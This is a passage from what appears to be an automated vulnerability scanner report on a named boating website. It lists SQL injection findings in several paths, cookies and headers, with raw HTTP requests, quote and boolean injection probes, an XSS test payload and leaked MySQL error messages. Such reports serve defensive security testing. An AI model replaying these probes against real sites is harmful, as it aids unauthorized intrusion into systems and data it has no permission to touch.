Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"-->
...[SNIP]...

1.5. http://www.soundingsonline.com/archives ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E' HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E'' AND cooki' at line 1</font>
...[SNIP]...

1.6. http://www.soundingsonline.com/archives [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=90plqvgiq64ahge1urijnrrll5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"-->
...[SNIP]...

Request 2

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)''
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.7. http://www.soundingsonline.com/archives [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1'; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=f953kv0sgtapd396agsosf0ie5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E' AND cookie' at line 1</font>
...[SNIP]...

Request 2

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1''; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.8. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /archives?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.9. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit; s_sq=%5B%5BB%5D%5D; count=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E&1'=1' AND c' at line 1</font>
...[SNIP]...

1.10. http://www.soundingsonline.com/archives [s_lv_s cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The s_lv_s cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the s_lv_s cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.1.10.1295922240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_nr=1295922239670; s_lv=1295922239670; s_lv_s=First%20Visit'%20and%201%3d1--%20; s_sq=%5B%5BB%5D%5D; count=2

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E' AND cookie' at line 1</font>
...[SNIP]...

1.11. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.12. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/know-how?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/know-how?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.13. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-boats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-boats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.14. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-gear?1'=1 HTTP/1.1
